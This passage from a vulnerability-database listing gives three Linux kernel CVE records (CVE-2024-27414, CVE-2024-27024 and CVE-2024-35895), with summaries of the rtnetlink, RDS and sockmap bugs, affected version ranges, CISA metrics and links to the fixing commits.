"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27414 (GCVE-0-2024-27414)
Vulnerability from cvelistv5
Published
2024-05-17 11:50
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back
In the commit d73ef2d69c0d ("rtnetlink: let rtnl_bridge_setlink checks
IFLA_BRIDGE_MODE length"), an adjustment was made to the old loop logic
in the function `rtnl_bridge_setlink` to enable the loop to also check
the length of the IFLA_BRIDGE_MODE attribute. However, this adjustment
removed the `break` statement and led to an error logic of the flags
writing back at the end of this function.
if (have_flags)
memcpy(nla_data(attr), &flags, sizeof(flags));
// attr should point to IFLA_BRIDGE_FLAGS NLA !!!
Before the mentioned commit, the `attr` is granted to be IFLA_BRIDGE_FLAGS.
However, this is not necessarily true fow now as the updated loop will let
the attr point to the last NLA, even an invalid NLA which could cause
overflow writes.
This patch introduces a new variable `br_flag` to save the NLA pointer
that points to IFLA_BRIDGE_FLAGS and uses it to resolve the mentioned
error logic.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ad46d4861ed36315d3d9e838723ba3e367ecc042 Version: abb0172fa8dc4a4ec51aa992b7269ed65959f310 Version: 047508edd602921ee8bb0f2aa2100aa2e9bedc75 Version: 8dfac8071d58447e5cace4c4c6fe493ce2f615f6 Version: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f Version: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f Version: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f Version: 00757f58e37b2d9a6f99e15be484712390cd2bab |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27414",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-21T15:56:59.979228Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:58.154Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.359Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9fbc44159dfc3e9a7073032752d9e03f5194a6f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/882a51a10ecf24ce135d573afa0872aef02c5125"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1227b27fcccc99dc44f912b479e01a17e2d7d31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2261eb994aa5757c1da046b78e3229a3ece0ad9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/167d8642daa6a44b51de17f8ff0f584e1e762db7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/831bc2728fb48a8957a824cba8c264b30dca1425"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/743ad091fb46e622f1b690385bb15e3cd3daf874"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/rtnetlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b9fbc44159dfc3e9a7073032752d9e03f5194a6f",
"status": "affected",
"version": "ad46d4861ed36315d3d9e838723ba3e367ecc042",
"versionType": "git"
},
{
"lessThan": "882a51a10ecf24ce135d573afa0872aef02c5125",
"status": "affected",
"version": "abb0172fa8dc4a4ec51aa992b7269ed65959f310",
"versionType": "git"
},
{
"lessThan": "a1227b27fcccc99dc44f912b479e01a17e2d7d31",
"status": "affected",
"version": "047508edd602921ee8bb0f2aa2100aa2e9bedc75",
"versionType": "git"
},
{
"lessThan": "f2261eb994aa5757c1da046b78e3229a3ece0ad9",
"status": "affected",
"version": "8dfac8071d58447e5cace4c4c6fe493ce2f615f6",
"versionType": "git"
},
{
"lessThan": "167d8642daa6a44b51de17f8ff0f584e1e762db7",
"status": "affected",
"version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
"versionType": "git"
},
{
"lessThan": "831bc2728fb48a8957a824cba8c264b30dca1425",
"status": "affected",
"version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
"versionType": "git"
},
{
"lessThan": "743ad091fb46e622f1b690385bb15e3cd3daf874",
"status": "affected",
"version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
"versionType": "git"
},
{
"status": "affected",
"version": "00757f58e37b2d9a6f99e15be484712390cd2bab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/rtnetlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.4.253",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.10.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.15.126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "6.1.45",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back\n\nIn the commit d73ef2d69c0d (\"rtnetlink: let rtnl_bridge_setlink checks\nIFLA_BRIDGE_MODE length\"), an adjustment was made to the old loop logic\nin the function `rtnl_bridge_setlink` to enable the loop to also check\nthe length of the IFLA_BRIDGE_MODE attribute. However, this adjustment\nremoved the `break` statement and led to an error logic of the flags\nwriting back at the end of this function.\n\nif (have_flags)\n memcpy(nla_data(attr), \u0026flags, sizeof(flags));\n // attr should point to IFLA_BRIDGE_FLAGS NLA !!!\n\nBefore the mentioned commit, the `attr` is granted to be IFLA_BRIDGE_FLAGS.\nHowever, this is not necessarily true fow now as the updated loop will let\nthe attr point to the last NLA, even an invalid NLA which could cause\noverflow writes.\n\nThis patch introduces a new variable `br_flag` to save the NLA pointer\nthat points to IFLA_BRIDGE_FLAGS and uses it to resolve the mentioned\nerror logic."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:42.575Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b9fbc44159dfc3e9a7073032752d9e03f5194a6f"
},
{
"url": "https://git.kernel.org/stable/c/882a51a10ecf24ce135d573afa0872aef02c5125"
},
{
"url": "https://git.kernel.org/stable/c/a1227b27fcccc99dc44f912b479e01a17e2d7d31"
},
{
"url": "https://git.kernel.org/stable/c/f2261eb994aa5757c1da046b78e3229a3ece0ad9"
},
{
"url": "https://git.kernel.org/stable/c/167d8642daa6a44b51de17f8ff0f584e1e762db7"
},
{
"url": "https://git.kernel.org/stable/c/831bc2728fb48a8957a824cba8c264b30dca1425"
},
{
"url": "https://git.kernel.org/stable/c/743ad091fb46e622f1b690385bb15e3cd3daf874"
}
],
"title": "rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27414",
"datePublished": "2024-05-17T11:50:57.207Z",
"dateReserved": "2024-02-25T13:47:42.682Z",
"dateUpdated": "2025-05-04T12:55:42.575Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27024 (GCVE-0-2024-27024)
Vulnerability from cvelistv5
Published
2024-05-01 12:49
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix WARNING in rds_conn_connect_if_down
If connection isn't established yet, get_mr() will fail, trigger connection after
get_mr().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 952835ccd917682ebb705f89ff1e56fbf068a1d8 Version: 783941bd9f445a37c2854ec0b4cb9f9e603193a7 Version: 57d2ce1603101ce3f30d0ccdc35b98af08d2ed88 Version: 5ba1957f889f575f2a240eafe543c3fda5aa72e0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.871Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/786854141057751bc08eb26f1b02e97c1631c8f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/997efea2bf3a4adb96c306b9ad6a91442237bf5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9dfc15a10dfd44f8ff7f27488651cb5be6af83c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b562ebe21ed9adcf42242797dd6cb75beef12bf0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/998fd719e6d6468b930ac0c44552ea9ff8b07b80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b505d05280739ce31d5708da840f42df827cb85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/907761307469adecb02461a14120e9a1812a5fb1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c055fc00c07be1f0df7375ab0036cebd1106ed38"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27024",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:34.133420Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:36.432Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c",
"net/rds/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "786854141057751bc08eb26f1b02e97c1631c8f4",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "997efea2bf3a4adb96c306b9ad6a91442237bf5b",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "9dfc15a10dfd44f8ff7f27488651cb5be6af83c2",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "b562ebe21ed9adcf42242797dd6cb75beef12bf0",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "998fd719e6d6468b930ac0c44552ea9ff8b07b80",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "2b505d05280739ce31d5708da840f42df827cb85",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "907761307469adecb02461a14120e9a1812a5fb1",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"status": "affected",
"version": "952835ccd917682ebb705f89ff1e56fbf068a1d8",
"versionType": "git"
},
{
"status": "affected",
"version": "783941bd9f445a37c2854ec0b4cb9f9e603193a7",
"versionType": "git"
},
{
"status": "affected",
"version": "57d2ce1603101ce3f30d0ccdc35b98af08d2ed88",
"versionType": "git"
},
{
"status": "affected",
"version": "5ba1957f889f575f2a240eafe543c3fda5aa72e0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c",
"net/rds/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.1.48",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: fix WARNING in rds_conn_connect_if_down\n\nIf connection isn\u0027t established yet, get_mr() will fail, trigger connection after\nget_mr()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:25.042Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/786854141057751bc08eb26f1b02e97c1631c8f4"
},
{
"url": "https://git.kernel.org/stable/c/997efea2bf3a4adb96c306b9ad6a91442237bf5b"
},
{
"url": "https://git.kernel.org/stable/c/9dfc15a10dfd44f8ff7f27488651cb5be6af83c2"
},
{
"url": "https://git.kernel.org/stable/c/b562ebe21ed9adcf42242797dd6cb75beef12bf0"
},
{
"url": "https://git.kernel.org/stable/c/998fd719e6d6468b930ac0c44552ea9ff8b07b80"
},
{
"url": "https://git.kernel.org/stable/c/2b505d05280739ce31d5708da840f42df827cb85"
},
{
"url": "https://git.kernel.org/stable/c/907761307469adecb02461a14120e9a1812a5fb1"
},
{
"url": "https://git.kernel.org/stable/c/c055fc00c07be1f0df7375ab0036cebd1106ed38"
}
],
"title": "net/rds: fix WARNING in rds_conn_connect_if_down",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27024",
"datePublished": "2024-05-01T12:49:24.696Z",
"dateReserved": "2024-02-19T14:20:24.210Z",
"dateUpdated": "2025-05-04T12:55:25.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35895 (GCVE-0-2024-35895)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf, sockmap: Prevent lock inversion deadlock in map delete elem
syzkaller started using corpuses where a BPF tracing program deletes
elements from a sockmap/sockhash map. Because BPF tracing programs can be
invoked from any interrupt context, locks taken during a map_delete_elem
operation must be hardirq-safe. Otherwise a deadlock due to lock inversion
is possible, as reported by lockdep:
CPU0 CPU1
---- ----
lock(&htab->buckets[i].lock);
local_irq_disable();
lock(&host->lock);
lock(&htab->buckets[i].lock);
<Interrupt>
lock(&host->lock);
Locks in sockmap are hardirq-unsafe by design. We expects elements to be
deleted from sockmap/sockhash only in task (normal) context with interrupts
enabled, or in softirq context.
Detect when map_delete_elem operation is invoked from a context which is
_not_ hardirq-unsafe, that is interrupts are disabled, and bail out with an
error.
Note that map updates are not affected by this issue. BPF verifier does not
allow updating sockmap/sockhash from a BPF tracing program today.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c Version: 604326b41a6fb9b4a78b6179335decee0365cd8c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35895",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:25:39.256006Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:48.419Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.577Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f7990498b05ac41f7d6a190dc0418ef1d21bf058"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd54b48db0c822ae7b520bc80751f0a0a173ef75"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a44770fed86515eedb5a7c00b787f847ebb134a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/668b3074aa14829e2ac2759799537a93b60fef86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6af057ccdd8e7619960aca1f0428339f213b31cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff91059932401894e6c86341915615c5eb0eca48"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/sock_map.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f7990498b05ac41f7d6a190dc0418ef1d21bf058",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "dd54b48db0c822ae7b520bc80751f0a0a173ef75",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "a44770fed86515eedb5a7c00b787f847ebb134a5",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "668b3074aa14829e2ac2759799537a93b60fef86",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "6af057ccdd8e7619960aca1f0428339f213b31cd",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
},
{
"lessThan": "ff91059932401894e6c86341915615c5eb0eca48",
"status": "affected",
"version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/sock_map.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Prevent lock inversion deadlock in map delete elem\n\nsyzkaller started using corpuses where a BPF tracing program deletes\nelements from a sockmap/sockhash map. Because BPF tracing programs can be\ninvoked from any interrupt context, locks taken during a map_delete_elem\noperation must be hardirq-safe. Otherwise a deadlock due to lock inversion\nis possible, as reported by lockdep:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026htab-\u003ebuckets[i].lock);\n local_irq_disable();\n lock(\u0026host-\u003elock);\n lock(\u0026htab-\u003ebuckets[i].lock);\n \u003cInterrupt\u003e\n lock(\u0026host-\u003elock);\n\nLocks in sockmap are hardirq-unsafe by design. We expects elements to be\ndeleted from sockmap/sockhash only in task (normal) context with interrupts\nenabled, or in softirq context.\n\nDetect when map_delete_elem operation is invoked from a context which is\n_not_ hardirq-unsafe, that is interrupts are disabled, and bail out with an\nerror.\n\nNote that map updates are not affected by this issue. BPF verifier does not\nallow updating sockmap/sockhash from a BPF tracing program today."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:50.310Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f7990498b05ac41f7d6a190dc0418ef1d21bf058"
},
{
